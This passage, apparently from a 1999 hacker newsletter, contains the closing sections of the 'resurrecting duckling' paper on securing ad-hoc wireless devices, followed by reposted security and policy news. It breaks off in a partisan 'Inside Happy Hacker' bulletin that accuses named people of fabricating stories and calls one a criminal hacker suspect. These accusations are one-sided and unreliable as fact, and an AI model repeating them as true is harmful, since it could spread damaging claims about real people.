(typically, but not necessarily, a user and a peripheral). For example, there has been significant interest in the possibility of a police pistol that can only fire when held by the officer to whom it was issued, who for this purpose might be wearing a very short range radio ring: at present, in the USA, a large number of the firearm injuries sustained by policemen come from stolen police guns. Similar considerations might apply to more substantial weapon systems, such as artillery, that might fall into enemy hands. The "resurrecting duckling'' security policy A metaphor inspired by biology will help us describe the behaviour of a device that properly implements secure transient association. As Konrad Lorenz beautifully narrates [Lorenz], a duckling emerging from its egg will recognise as its mother the first moving object it sees that makes a sound, regardless of what it looks like: this phenomenon is called imprinting. Similarly, our device (whose egg is the shrink-wrapped box that encloses it as it comes out of the factory) will recognise as its owner the first entity that sends it a secret key. As soon as this `ignition key' is received, the device is no longer a newborn and will stay faithful to its owner for the rest of its life. If several entities are present at the device's birth, then the first one that sends it a key becomes the owner: to use another biological metaphor, only the first sperm gets to fertilise the egg. We can view the hardware of the device as the body, and the software (particularly the state) as the soul. As long as the soul stays in the body, the duckling remains alive and bound to the same mother to which it was imprinted. But this bond is broken by death: thereupon, the soul dissolves and the body returns in its pre-birth state, with the resurrecting duckling ready for another imprinting that will start a new life with another soul. Death is the only event that returns a live device to the pre-birth state in which it will accept an imprinting. We call this process reverse metempsychosis. Metempsychosis refers to the transmigration of souls as proposed in a number of religions; our policy is the reverse of this as, rather than a single soul inhabiting a succession of bodies, we have a single body inhabited by a succession of souls[Note: Prior art on this technique includes Larry Niven's science fiction novel A World Out of Time (1977) in which convicted criminals have their personalities "wiped'' and their bodies recycled.]. With some devices, death can be designed to follow an identifiable transaction: our medical thermometer can be designed to die (and lose its memory of the previous key and patient) when returned to the bowl of disinfectant. With others, we can arrange a simple timeout, so that the duckling dies of old age. With other devices (and particularly those liable to be stolen) we will arrange that the duckling will only die when so instructed by its mother: thus only the currently authorised user may transfer control of the device. In order to enforce this, some level of tamper resistance will be required: assassinating the duckling without damaging its body should be made suitably difficult and expensive. In some applications we may need to be able to recover from circumstances in which the legitimate user loses the shared secret (e.g. the password is forgotten or the remote control is broken beyond repair). To be able to regain control of the duckling, one should allow for escrowed seppuku: someone other than the mother, such as the manufacturer, holds the role of Shogun with a master password that can command the device to commit suicide. In other applications, only part of the duckling's soul should perish. In fact, our thermometer will typically be calibrated every six months by the hospital's (or manufacturer's) technician, and the calibration information must not be erased along with the patient data and user key when the device is disinfected, but only when it is plugged into a calibration station. So we may consider the device to be endowed with two souls-the calibration state and the user state-and a rule that the latter may not influence the former. So our resurrecting duckling security policy may be combined with multilevel security concepts (in fact, "multilevel secure souls'' are a neat application of the Biba integrity policy model [Biba1975]). Imprinting During the imprinting phase, as we said, a shared secret is established between the duckling and the mother. Again, we might think that this is easy to do. If at least one of the two principals involved can perform the expensive public key operations (decrypt and sign), the other device then simply generates a random secret and encrypts it under the public key of the powerful device from which it gets back a signed confirmation. But many of our nodes lack the ability to do public key, and even if they did it would still not help much. Suppose that a doctor picks up a thermometer and tries to get his palmtop to do a Diffie-Hellman key exchange with it over the air. How can he be sure that the key has been established with the right thermometer? If both devices have screens, then a hash of the key might be displayed and verified manually; but this is bad engineering as it is both tedious and error-prone, and in an environment where we want neither. We are not likely to want to give a screen to every device; after all, sharing peripherals is one of the goals of ad-hoc networking. In many applications, there will only be one satisfactory solution, and we advocate its use generally as it is effective, cheap and simple: physical contact. When the device is in the pre-birth state, simply touching it with an electrical contact that transfers the bits of a shared secret constitutes the imprinting. No cryptography is involved, since the secret is transmitted in plaintext, and there is no ambiguity about which two entities are involved in the binding. Note that an imprinted duckling may still interact with principals other than its mother-it just cannot be controlled by them. In our medical application, we would usually want the thermometer to report the patient's temperature to any device in the ward which asked for it. Only in exceptional circumstances (such as a celebrity patient, or a patient with a socially stigmatised condition) would the patient require encrypted communications to a single doctor's PDA. So should we also have an option of imprinting the device with a cleartext access control list (and perhaps the patient's name), rather than an ignition key? This brings us back to the issue raised at the end of section *, namely how we might enable a single device to support security mechanisms of differing strength. The solution that we favour is to always bootstrap by establishing a shared secret and to use strong cryptography to download more specific policies into the node. The mother can always send the duckling an access control list or whatever in a message protected by the shared secret. Having a key in place means that the mother can change its mind later; so if the patient is diagnosed HIV positive and requests secure handling of his data from then on, the doctor does not have to kill and reinitialise all the equipment at his bedside. In general, it appears sound policy to delegate from a position of strength. Integrity So far we have seen that denial of service, the goals of authentication, and the mechanisms for identifying other principals are surprisingly different in an ad-hoc network. Is there any role for the more conventional computer security mechanisms? The answer appears to be a qualified yes when we look at integrity. Integrity means ensuring that the node has not been maliciously altered. The recipient wants to be sure that the measurements come from the genuine thermometer and not from a node that has been modified to send out incorrect temperature values (maybe so as to disrupt the operation of the recipient's nuclear power plant). If you can't afford signatures... Prudence dictates that a patient's temperature should only be measured by a "known good'' thermometer, such as one that passed a calibration inspection within the last six months. So it is natural for calibrators to issue signed dated certificates (though some care must be taken if some of the thermometer's prospective clients do not possess a clock). But the certificate could have been replayed by a middleman. What sort of mechanisms should be implemented to prevent this? If the thermometer can perform digital signatures and the palmtop can check them, the solution is straightforward: the thermometer's calibration certificate can include the node's public key. Where the thermometer cannot perform public key cryptography, the palmtop will establish a common secret with the thermometer using the techniques of section * and, having verified its certificate, will be able to accept messages protected by a MAC keyed with the shared secret. At this point, we depart once more from the conventional wisdom of the computer security community. The obvious objection is that, since neither certificates nor IDs are secret, a false device might be constructed which clones a genuine one; and that the only proper way to use a certificate is to certify a public key whose private key is known only to the device. However, this is tied up closely with the issues of tamper proofness and tamper evidentness. If our devices are not tamper-proof, then the private key can be read out and installed in a bogus device; but if they meet the much weaker requirement of tamper-evidentness (say with sealed enclosures), a forger will not be able to produce an intact seal on the bogus device. So we will have confidence in a certificate which we receive protected under an ignition key that we shared successfully with a device whose seal was intact. (This is the first example we know of a purely "bearer'' certificate: it need not contain a name or even a pseudonym.) We will now discuss this in more detail. Tamper resistance The doctor's reliance on the "genuine thermometer'' certificate assumed that, after the thermometer was last inspected, calibrated and certified, it stayed that way. This assumption may be questioned in many applications, especially as in Piconet not all nodes are well guarded, highly personal accessories such as Java rings [java-ring-www] over which the owner is expected to keep close and continuous control. On the contrary, many nodes (such as broadcasting sensors) may be commodities that are scattered around and left to their fate. With such a model an attacker may, and sooner or later will, modify or forge a deployed node, possibly redeploying the corrupted node in an unsuspecting environment. This can in theory be avoided by making the node tamper-proof, but it is much easier to talk about this property than to implement it in practice [tamper-resistance], especially within the cost and form factor constraints of personal consumer electronics devices. Under the circumstances, it is not clear how much extra assurance is given by furnishing our thermometer with the ability to do public key cryptography; such a device can have its private key read out just as a device with a certificate but without a private/public keypair can be forged. In such environments it may often be more suitable to use physical tamper-evidence mechanisms (such as seals) rather than electronic mechanisms (such as tamper sensing switches that zeroise memory). In this case, one must still design the device so that non-intrusive attacks (such as those based on protocol failure, power analysis and glitch attacks [cheap-tamper]) are not practical; it is also necessary to take into account the time that might pass before a broken seal is noticed, and the likelihood of successful attacks on the sealing mechanism [johnston-seals]. It must also be realised that the tampering may not be limited to the onboard code and keys: a very effective attack on the unattended thermometer is to simply replace its analogue sensing element with a bad one. This attack highlights that even enclosing the entire processor, memory and backup battery in a high-grade tamper resistant enclosure, with only a ribbon connector to interface with the outside world, would still leave us vulnerable to direct attacks on its "peripherals''. Bringing the sensor itself within the tamper resistant enclosure may make manufacturing too expensive (the computing and communication core willl no longer be a modular building block) and may even interfere with the proper working of the sensor. So the transducer may be an Achilles' heel, and it may not be worth spending large sums on tamper-proofing the core if the sensor cannot economically be protected. When making decisions about what level of tamper-proofness or tamper-evidentness a system needs, it is as well to bear in mind that corrupt nodes can be used in a number of ways. Attacks might be immediate and direct, or alternatively the attacker might field a number of nodes which would accept software upgrades from him as well as from the authorised source. Software upload For nodes to be useful, there has to be a way to upload software into them, if nothing else during manufacture; in many applications we will also want to do this after deployment. So we will want to prevent opponents from exploiting the upload mechanism, whatever it is, to infiltrate malicious code, and we will want to be able to detect whether a given node is running genuine software or not. Neither of these goals can be met without assuming that at least some core bootstrap portion of the node escapes tampering. The validity of such an assumption will depend on the circumstances; the expected motivation and ability of the attackers, and the effort spent not just on protecting the node with tamper-resistance mechanisms and seals, but in inspection, audit and other system controls. Confidentiality We find that we have little to say about confidentiality other than remarking that it is pointless to attempt to protect the secrecy of a communication without first ensuring that one is talking to the right principal. Authenticity is where the real issues are and, once these are solved, protecting confidentiality is simply a matter of encrypting the session using whatever key material is available. In the event that covert or jam-resistant communications are required, then the key material can be used to initialise spread-spectrum or frequency-hopping communication. Note that, in the absence of shared key material and an accurate time source, such techniques are problematic during the important initial resource discovery phase in which devices try to determine which other nodes are nearby. Conclusions We examined the main security issues that arise in an ad-hoc wireless network of mobile devices. The design space of this environment is constrained by tight bounds on power budget and CPU cycles, and by the intermittent nature of communication. This combination makes much of the conventional wisdom about authentication, naming and service denial irrelevant; even tamper resistance is not completely straightforward. There are interesting new attacks, such as the sleep deprivation torture, and limitations on the acceptable primitives for cryptographic protocols. However, there are also new opportunities opened up by the model of secure transient association, which we believe may become increasingly important in real networking applications. The contribution of this paper was to spell out the new problems and opportunities, and to offer a new way of thinking about the solution space-the resurrecting duckling security policy model. Acknowledgements We thank Alan Jones for suggesting the wireless thermometer, a prototype of which had just been built in the context of Piconet, as a minimal but still meaningful practical example. References [tamper-resistance] Ross Anderson and Markus Kuhn. Tamper resistance-a cautionary note. In Proc.2nd USENIX Workshop on Electronic Commerce, 1996. [cheap-tamper] Ross Anderson and Markus Kuhn. Low cost attacks on tamper resistant devices. In Mark Lomas et al., editor, Security Protocols, 5th International Workshop Proceedings, volume 1361 of Lecture Notes in Computer Science, pages 125-136. Springer-Verlag, 1997. [irda-www] Infrared Data Association. http://www.irda.org/. [piconet97] Frazer Bennett, David Clarke, Joseph B. Evans, Andy Hopper, Alan Jones, and David Leask. Piconet: Embedded mobile networking. IEEE Personal Communications, 4(5):8-15, October 1997. [Biba1975] Kenneth J. Biba. Integrity considerations for secure computer systems. Technical Report MTR-3153, MITRE Corporation, April 1975. [homerf-www] HomeRF Working Group. http://www.homerf.org/. [bluetooth98] Jaap Haartsen, Mahmoud Naghshineh, Jon Inouye, Olaf J. Joeressen, and Warren Allen. Bluetooth: Visions, goals, and architecture. ACM Mobile Computing and Communications Review, 2(4):38-45, October 1998. [firewire] IEEE. IEEE standard for a high performance serial bus. IEEE Standard 1394, 1995. [johnston-seals] Roger G. Johnston and Anthony R.E. Garcia. Vulnerability assessment of security seals. Journal of Security Administration, 20(1):15-27, June 1997. [Lorenz] Konrad Lorenz. Er redete mit dem Vieh, den Vögeln und den Fischen (King Solomon's ring). Borotha-Schoeler, Wien, 1949. [java-ring-www] Sun Microsystems. http://java.sun.com/features/1998/03/rings.html. [homerf98] Kevin J. Negus, John Waters, Jean Tourrilhes, Chris Romans, Jim Lansford, and Stephen Hui. HomeRF and SWAP: Wireless networking for the connected home. ACM Mobile Computing and Communications Review, 2(4):28-37, October 1998. [bluetooth-www] Bluetooth SIG. http://www.bluetooth.com/. [LaTeX -> HTML by ltoh] http://www.cl.cam.ac.uk/~fms27/duckling/ (frank.stajano@cl.cam.ac.uk) Last modified: May 20 1999 @HWA 83.0 GOV'T IT EXECS SEEK SOFTWARE ACCOUNTABILITY ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by Thejian, Wednesday 20th October 1999 on 11:05 pm CET Federal agencies, which have begun spending millions to upgrade information security in response to a presidential directive, say protecting computer networks will also mean finding ways to hold software vendors accountable for the quality of their products. John Gilligan, CIO of the U.S. Department of Energy, said users have to "focus our attention" on better defining the expectations and enforcement of warranties for commercial software. Vendors must "provide products that will either be free from certain types of vulnerabilities or reliability problems or they will have financial liability". Computerworld. (Online News, 10/19/99 04:54 PM) Gov't IT execs seek 'software accountability' By Patrick Thibodeau ARLINGTON, Va. -- Federal agencies, which have begun spending millions to upgrade information security in response to a presidential directive, say protecting computer networks will also mean finding ways to hold software vendors accountable for the quality of their products. John Gilligan, CIO of the U.S. Department of Energy, said users have to "focus our attention" on better defining the expectations and enforcement of warranties for commercial software. Vendors must "provide products that will either be free from certain types of vulnerabilities or reliability problems or they will have financial liability," said Gilligan, speaking today at the U.S. Department of Commerce's National Information Systems Security Conference. Federal agencies were ordered by President Clinton last year to do what's necessary to protect critical systems from information security threats. The order set off a scramble among agencies to develop security plans and seek money from Congress. But some issues aren't easily addressed. U.S. agencies are becoming "increasingly more reliant on commercial off-the-shelf products" said Christopher Mellon, deputy assistant secretary of defense for security and information operations. And it's difficult to tell, in some cases, where commercial software code "was written, what its heritage is and to even know what it is you are buying," he said. Defense and other federal agencies are working on plans to improve information security through training, vulnerability testing and system improvements that include developing incident-response teams to tackle security threats. Agencies are also improving training for system-administration workers. But Congress is balking on funding. The Commerce Department is seeking some $79 million for its information-security work; and the Department Energy, which was plagued by an espionage scandal, asked for some $35 million this year, which it has not yet received. Federal officials say security funding is cost effective. One security incident can cost as much as $500,000 to repair. As with private industry, the information security threats posed by disgruntled employees are greater for government systems than attacks from outside. But an exception to that rule is the National Aeronautics and Space Administration. According to David Nelson, the deputy CIO at NASA, most of its system attacks and intrusions come from outside the agency. Nelson said he's puzzled by it. About the only thing that can explain it, Nelson concluded, "is NASA is a pretty good place to work." @HWA 84.0 DEFAULT #7 OUT ~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by BHZ, Wednesday 20th October 1999 on 11:05 pm CET Default issue seven was released. Again you could read some interesting topics: 5 reasons why your Mac is safer than winte, Setting up a great desktop Linux, How to make safe Windows 95 based server, Apple Power Mac G4, Web based encrypted e-mail (critic and the response), More from the ACPO front, Welcome to the wonderful world of cellular phreaking, Unix logging and auditing tools). Default and default webboard. http://default.net-security.org http://www.net-security.org/webboard.html @HWA 85.0 UK POLICE GETTING THE POWER TO TAP E-MAIL? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by Thejian, Wednesday 20th October 1999 on 1:45 am CET UK computer users who refuse to divulge their passwords to the authorities face up to two years in jail under increased police powers to be unveiled in next month's Queen's speech. Other measures drawn up by the government will make it easier for companies to monitor employees' phone calls and e-mails. A third part of the crackdown will give the police new authority to tap mobile phone calls, pager messages and e-mail. The Sunday Times. http://www.sunday-times.co.uk/news/pages/sti/99/10/17/stinwenws01031.html?999 October 17 1999 BRITAIN Police to get power to tap e-mail Michael Prescott, Political Editor COMPUTER users who refuse to divulge their passwords to the authorities face up to two years in jail under increased police powers to be unveiled in next month's Queen's speech. Other measures drawn up by the government will make it easier for companies to monitor employees' phone calls and e-mails. A third part of the crackdown will give the police new authority to tap mobile phone calls, pager messages and e-mail. The plans were already attracting criticism last night, with one Tory MP warning that the government risked creating "a state surveillance system like something out of Orwell's 1984". Government ministers will justify the measures as necessary to trap pornographers, drug traffickers and fraudsters who exploit new technology. Police officers who gain a search warrant from the courts can already look at computer files, but provisions in the forthcoming e-commerce bill will allow them to demand passwords used to protect sensitive data. A suspect who witholds them faces a jail term of up to two years. "Paedophiles and drug barons tend to send material that can be unlocked only if you know a code often extending to many digits," said a senior government source last night. "The law has to catch up with this." The bill will also legally oblige internet service providers (ISPs) to keep records showing to and from whom material has been sent and received. In spite of industry complaints about the cost, ministers want the ISPs to keep detailed records on all customers for days at a time. "The provision will prove invaluable in tracking down paedophile rings, for example," said a source at the Department of Trade and Industry, which has drawn up the measure in co-operation with the Home Office. Many companies monitor employees' phone calls and e-mails to ensure customers and clients are being dealt with according to required standards. This is a grey area legally, but the Home Office is to give firms a legal right to monitor their workers, so long as they warn them that this is company practice. The proposed new Interception of Communication Act will also deal with criminals who frequently change their mobile phone numbers and e-mail addresses, to exploit the fact that warrants are issued for a particular number or address. New catch-all warrants will cover all of a named individual's communications devices and will last for three months instead of two. @HWA 86.0 WASHINGTON DIVIDED ON NET SIGNATURES BILL ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by Thejian, Wednesday 20th October 1999 on 1:25 am CET Continuing confusion over just what version of digital signature legislation will be considered on the floor of the House of Representatives has caused House leadership to pull consideration of the bill until next week. Aides to House Majority Leader Richard Armey did not return telephone calls seeking comments, but a reliable congressional source told Newsbytes that the House Judiciary and Commerce Committees still need to work out some kind of compromise on their different versions of the bill before it goes through the Rules Committee and eventually to the House floor. http://www.newsbytes.com/pubNews/99/138045.html House Won't Vote On Net Signatures Today By Robert MacMillan, Newsbytes WASHINGTON, DC, U.S.A., 19 Oct 1999, 3:57 PM CST Continuing confusion over just what version of digital signature legislation will be considered on the floor of the House of Representatives has caused House leadership to pull consideration of the bill until next week. Aides to House Majority Leader Richard Armey, R-Texas, did not return telephone calls seeking comments, but a reliable congressional source told Newsbytes that the House Judiciary and Commerce Committees still need to work out some kind of compromise on their different versions of the bill before it goes through the Rules Committee and eventually to the House floor. A source in the Commerce Committee said that the committee still is optimistic about working out a version of the legislation that suits their interests, despite the fact that the Judiciary Committee made substantial changes to their version of the bill. It now is up to Rules Committee Chairman David Dreier, R-Calif., and his colleagues either to help forge compromise legislation between the two committees, to choose one version of the bill to send to the floor for a vote, or even to send both versions for consideration. The bill, H.R. 1714, known as the E-SIGN Act, had been scheduled for a quick suspension vote in the House today, but House sources confirmed that the bill had been pulled this morning. The purpose of the legislation is to provide a national framework that legalizes the use of digital signatures, but many Democratic members were concerned that it unfairly preempts states from enforcing their own laws. Republicans on the Judiciary Committee argued that the Democratic alternative wipes out the purpose for the legislation, which is to develop a national legal standard to make digital signatures legally binding. Reported by Newsbytes.com, http://www.newsbytes.com . 15:57 CST Reposted 17:34 CST @HWA 87.0 FEDS STILL HAVING TROUBLE FINDING CYBERSECURITY ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by Thejian, Wednesday 20th October 1999 on 1:10 am CET Despite mounting pressure from Congress to make tangible progress on the governmentwide effort to protect critical federal information systems from hackers and other criminals, agencies continue to struggle with funding, personnel and training roadblocks, officials said today. Under Presidential Decision Directive 63, signed in May 1998, all federal agencies are required to develop plans and take steps to protect their critical infrastructure. Agency CIOs, however, are having serious problems finding the resources to actually follow this through. Federal Computer Week. http://www.fcw.com/pubs/fcw/1999/1018/web-pdd-10-19-99.html OCTOBER 19, 1999 . . . 14:31 EDT Feds having trouble finding money, people for cybersecurity BY DIANE FRANK (dfrank@fcw.com) CRYSTAL CITY, Va. -- Despite mounting pressure from Congress to make tangible progress on the governmentwide effort to protect critical federal information systems from hackers and other criminals, agencies continue to struggle with funding, personnel and training roadblocks, officials said today. Under Presidential Decision Directive 63, signed in May 1998, all federal agencies are required to develop plans and take steps to protect their critical infrastructure. Agency chief information officers have been charged with leading the protection of information systems under PDD 63 and are receiving pressure from administrators, Congress and auditors to install protective measures as soon as possible. Agency CIOs, however, said they are having trouble finding the resources to follow through. "It requires a lot of dollars to do PDD 63," said Roger Baker, CIO at the Commerce Department, during a panel session at the National Information Systems Security conference here. Making matters worse, the Office of Management and Budget has told Commerce to find the money it needs for cybersecurity within current budgets, not from new appropriations, Baker said. Other agencies are experiencing similar problems, including the Energy Department, which, despite several high-profile security breaches, recently lost its battle with Congress to get $35 million added to its fiscal 2000 budget for cybersecurity, said John Gilligan, CIO at DOE. Although lack of personnel is another well-known problem, most agencies are finding out that the real issue is training and awareness for current employees. NASA, for example, recently worked with the Defense Information Systems Agency to develop a new multimedia training CD-ROM that all NASA personnel are required to use. However, managers and system administrators require a different level of training, and the agency is putting together a pilot certification program at the John H. Glenn Research Center in Ohio. "System administrators are a critical point for us, and we are not yet happy about our training for our system administrators," said David Nelson, acting deputy CIO at NASA. Like many agencies, the Defense Department also is working with other agencies and with industry to find commercial products that meet the agency's security needs. "We need to work together and communicate [and] collaborate more closely than ever before in order to be effective," said Christopher Mellon, deputy assistant secretary of Defense for security and information operations. One solution DOD is considering is issuing a directive that Defense agencies must use products validated by the National Information Assurance Partnership, he said. The NIAP is a joint effort by the National Security Agency and the National Institute of Standards and Technology to certify that commercial products meet security standards. @HWA 88.0 CALIFORNIA TAKES DIGITAL SIGNATURES INTO USE ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by Thejian, Wednesday 20th October 1999 on 0:45 am CET Yesterday California officially authorized Verisign Inc. to begin issuing digital signature certificates to secure communications between state agencies and between the state and its citizens, ushering in a new era of electronic services delivery. Bill Jones, California's secretary of state, marked the occasion by digitally "signing" the authorization certificate for the company, making it the first such transaction since the state passed a law that spelled out the requirements for legally binding digital signatures. CNN. California inaugurates digital signatures October 19, 1999 Web posted at: 9:40 a.m. EDT (1340 GMT) by Dan Caterinicchia (IDG) -- Yesterday California officially authorized Verisign Inc. to begin issuing digital signature certificates to secure communications between state agencies and between the state and its citizens, ushering in a new era of electronic services delivery. Bill Jones, California's secretary of state, marked the occasion by digitally "signing" the authorization certificate for the company, making it the first such transaction since the state passed a law that spelled out the requirements for legally binding digital signatures. "We're bringing in the private sector to help us to create the opportunity for the public to access [government] services more quickly," Jones said. "Our goal is to deliver something that's easily accessible but doesn't add to the layers of government." Digital signatures are seen as a vital component of Internet-based commerce because they authenticate the identities of the parties involved in a transaction. Verisign, based in Mountain View, Calif., was the first to satisfy California's digital signature requirements. Jones said his department is interested in using digital signatures to enable residents to cast votes over the Internet. Other agencies have expressed a desire to use the tool to secure business filings and similar transactions, he said. Stratton Sclavos, Verisign's president and chief executive officer, said that for all the Internet has done to change the commerce landscape domestically and abroad, so far it has missed the "citizen-government relationship." He added that digital signature certification and the host of services it affects will exact a "fundamental change in the way citizens are going to interact with [state and local] government." Verisign is working on similar digital signature projects in Oregon, New Jersey, Utah and Washington, Sclavos said. @HWA 89.0 AMAZON'S CRYPTO CONTEST CRACKED WITHIN HOURS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by Thejian, Wednesday 20th October 1999 on 0:05 am CET On Monday, Amazon launched a two-week contest asking users to decipher the hidden meaning behind five lines of seemingly random numbers. The prize: a package of crypto books and a programmable robot kit. Hours after its launch, news of the contest hit the Internet code-cracking community in a big way. And in a few more hours, cryptographers were already talking about how they solved the puzzle. Wired. Code Crunchers Crack Contest by Joanna Glasner 1:35 p.m. 19.Oct.99.PDT A cure for the common code was reportedly found by a bunch of cryptographers this week. On Monday, Amazon launched a two-week contest asking users to decipher the hidden meaning behind five lines of seemingly random numbers. The prize: a package of crypto books and a programmable robot kit. The entrants: Just about anyone, really. No math degree needed, Amazon pledged. Heck, the online retailer even promised to throw in a couple of hints along the way to help out the less code-adept. As it turned out, it wasn't necessary. Hours after its launch, news of the contest hit the Internet code-cracking community in a big way. And in a few more hours, cryptographers were already talking about how they solved the puzzle. The hoopla began around 7 p.m. EDT on Monday, when Bradley Beth, a computer programmer from Richardson, Texas, sent an email posting about the contest to nerd-centric news and gossip site Slashdot.org. Within minutes, dozens of code-crunchers set to work on the puzzle, posting their theories along the way. Software developer Rob Montaro pitched in with what others took as a key insight: that some of the seemingly random numerals posted on Amazon's site actually matched up with the numbers used to reference books, known in publishing circles as ISBN numbers. Once that clue hit the wires, the rest was pretty easy, said Boston software engineer Seth Finkelstein. He spent a few minutes writing a PERL script to analyze the code and develop a few solutions based on Montaro's insight. In a couple of hours, he came up with a somewhat strangely worded but reasonably coherent solution that he eventually posted online. It was one of several such postings. (To see Amazon's crypto puzzle and Finkelstein's solution, click here.) Finkelstein shied away from taking credit for his feat. He said he's not certain the answer is entirely correct, adding it took no great skill to come up with a reasonable interpretation. "It's not a serious contest," he said. "The sheer number of people who cracked it show it is not useful for hiding a message. You wouldn't want your financial records to be protected this way." Amazon said the contest wasn't intended as a serious crypto test, but more as a kind of puzzle that might appeal to its code-crunching customers. Jennifer Buckendorff and Therese Littleton, the two Amazon site editors who designed the contest, saw it more as "a rainy afternoon treat for geeks" and a way to promote crypto-themed books. The company didn't disclose how many contest entries it has received, or whether any were correct. The winner will be chosen through a random drawing of correct entries at the end of the month. In the meantime, a few people thought the contest was being taken a bit too seriously. Or, in the words of one Slashdot poster: "This contest is supposed to be winnable by people who get stumped by crossword puzzles in USA Today, not by some paranoid lunatic that uses Ordo Novus Seclorum to read his email and encrypts his grocery list so that no one will find out he's buying stinky cheese and miniature vegetables." @HWA 90.0 SANS: CYBERSECURITY RISKS REAL ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by Thejian, Tuesday 19th October 1999 on 4:45 am CET The SANS Institute held one of its briefing last week to help IT managers debunk several myths that senior managers hold about computer security. The briefing took participants on four virtual "field trips" to the sites of actual past cyberattacks to convince them the threat is real. Computerworld. http://www.computerworld.com/home/news.nsf/idgnet/9910181sans (Online News, 10/18/99 04:58 PM) SANS: Cybersecurity risks real By Ann Harrison BEDFORD, Mass. -- On behalf of IT managers whose bosses may be skeptical about security risks, the SANS Institute offered a briefing last week that took participants on four virtual "field trips" to the sites of cyberattacks. The Washington-based cooperative research and education organization, which distributes information on computer security issues, held the briefing at MITRE Corp. The field trips were created to help IT managers debunk several myths that senior managers hold about computer security, said Alan Paller, the institute's director of research, who led the presentation. The first scenario, at the Oroville Dam in the Central Valley of California, was designed to dispel the myth that computer crackers can't do real damage. Paller explained that in 1992, the FBI determined that a cracker had obtained root or administrative access to computers that controlled every dam in the northern part of California. Pallor pointed out that even "noncritical" computers are networked to systems that have critical functions, such as controlling dam gates. The second field trip involved a 1998 incident when a Massachusetts teen-ager broke into the Bell Atlantic telephone system and disabled communication at the Worcester airport, preventing the airport's control tower from turning on runway lights for incoming flights. The scenario debunked the myth that crackers who do access systems have no malicious intent. Another example took on the notion that it is rare for someone to have enough skill and knowledge to break in to a professionally managed government computer. This scenario brought participants into a cracker's lab and showed the steps he might take to break in to a system. A final scenario brought attendees into a mock U.S. intelligence debriefing to evaluate the indications and warning signs after a cyberwar. The development of this scenario was funded by the National Security Agency and included power blackouts, passenger jet collisions, Alaska pipeline leaks and attacks on nuclear plants. The demonstration showed, among other things, how difficult it was to trace well-executed Web hacks due to Internet Protocol (IP)address spoofing, which can implicate innocent parties. At the conclusion of the presentation, Paller noted that results of security vulnerability tests to avoid cyberattacks often load system administrators with more tasks than they can handle, jeopardizing overall system security. He noted that online SNAP (System and Network Assurance Program) classes and off-line workshops detailed at www.sans.org are aimed at helping system administrators identify critical security weaknesses, prioritize corrective action and provide intensive training in security skills. Harold Leach Jr. of Legal Computer Solutions Inc. in Boston, which offers an Internet-based litigation support tool, said he was impressed by the presentation and interested in the SANS training. "It comes down to a question of risk, you fix the riskiest things first, but the problem is figuring out what the riskiest things are," Leach said. @HWA 91.0 "INTERVIEW" WITH MISTUH CLEAN ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by Thejian, Monday 18th October 1999 on 6:15 pm CET Singapore is still in the bane of the hackers, Samantha Santa Maria of the Straits Times asked mistuh clean, who recently defaced several sites over there, some questions regarding the subject. http://www.straitstimes.asia1.com/cyb/cyb3_1017.html Unfortunately this url has expired and gave me a 404, i was unable to find this 'interview' anywhere on the net, this is one reason for an archival newsletter such as this but I was too late in retrieving this story... sorry. @HWA 92.0 Inside Happy Hacker Oct 20th ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From AntiOnline mailing list. http://www.antionline.com/ ---------------------------------------------------------------- The following message was sent out via the AntiOnline Network. Please keep in mind, that the views and opinions expressed in this article are solely those of the message's author, and may not necessarily be the views and opinions of AntiOnline. Looking for a free e-mail account? Check out AntiOnline's Free Mail Service at http://www.AntiOnline.com/mail/ ----------------------------------------------------------------- __ __ __ __ __ / // /__ ____ ___ __ __ / // /__ _____/ /_____ ____ / _ / _ `/ _ \/ _ \/ // / / _ / _ `/ __/ '_/ -_) __/ /_//_/\_,_/ .__/ .__/\_, / /_//_/\_,_/\__/_/\_\\__/_/ /_/ /_/ /___/ Inside Happy Hacker, Oct. 20, 1999 _______________________________________________________________________ Table of Contents · New York Times Exposes Smear Campaign against Vranesevich · The Stephen Glass Syndrome (reporters who write hacker stories that they know are false) · Where the heck have we been? · Call for editors *** New York Times Exposes Smear Campaign against Vranesevich _______________________________________________________________________ Just in case you are wondering whether the stories Sprenger, Koch, and Penenberg have written about Vranesevich could possibly have any substance, please read a recent article in the New York Times about him. Reporter Matt Richtel actually interviewed the people involved instead of writing stories manufactured by Brian Martin and his imaginative crew at Attrition.org. Following are some highlights of Richtel's report: http://www.nytimes.com/library/tech/99/10/cyber/articles/08hackers.html .The new Vranesevich started to help government officials find people accused of malicious hacking. He said he turned over information to the FBI that led it to raid the home of a hacker named Brian Martin in connection with an attack on The New York Times' Web site in September 1998. .Martin, who admits to some malicious hacking in his past but says he has been an above-board security consultant for years, is a member of Attrition.org, a hacker group that has spearheaded an effort to discredit Vranesevich. .The group also says that Vranesevich paid a hacker to break into the Web site of the United States Senate so that AntiOnline could be the first to report it -- an accusation Vranesevich denies. Special Agent Jim Margolin of the FBI said the agency does not comment on whether it has investigated someone in the past. "But we continue to consult with Mr. Vranesevich, and that should say something about our assessment of his bona fides," he said. . his site continues to grow... Vranesevich runs it out of a rented three-room office space in Beaver, and said it gets "hundreds of thousands" of visitors each month. He has one full-time employee, paid and unpaid freelancers, and eight informers who keep him up to date on hacker activity. Among the site's users are research firms who are putting faith in Vranesevich to help them understand computer security. For example, he is working with Klein Associates, a consulting firm near Dayton Ohio that advises companies on decision-making techniques. So, folks, there you have it. A respected reporter (Matt Richtel) from the world's most prestigious newspaper (The New York Times) actually researched his article. He actually talked to the FBI instead of (as did Sprenger, Koch and Penenberg) trying to trick people into believing a malicious story about an FBI investigation concocted by criminal hacker suspect Martin. I can hardly believe that Penenberg who exposed Stephen 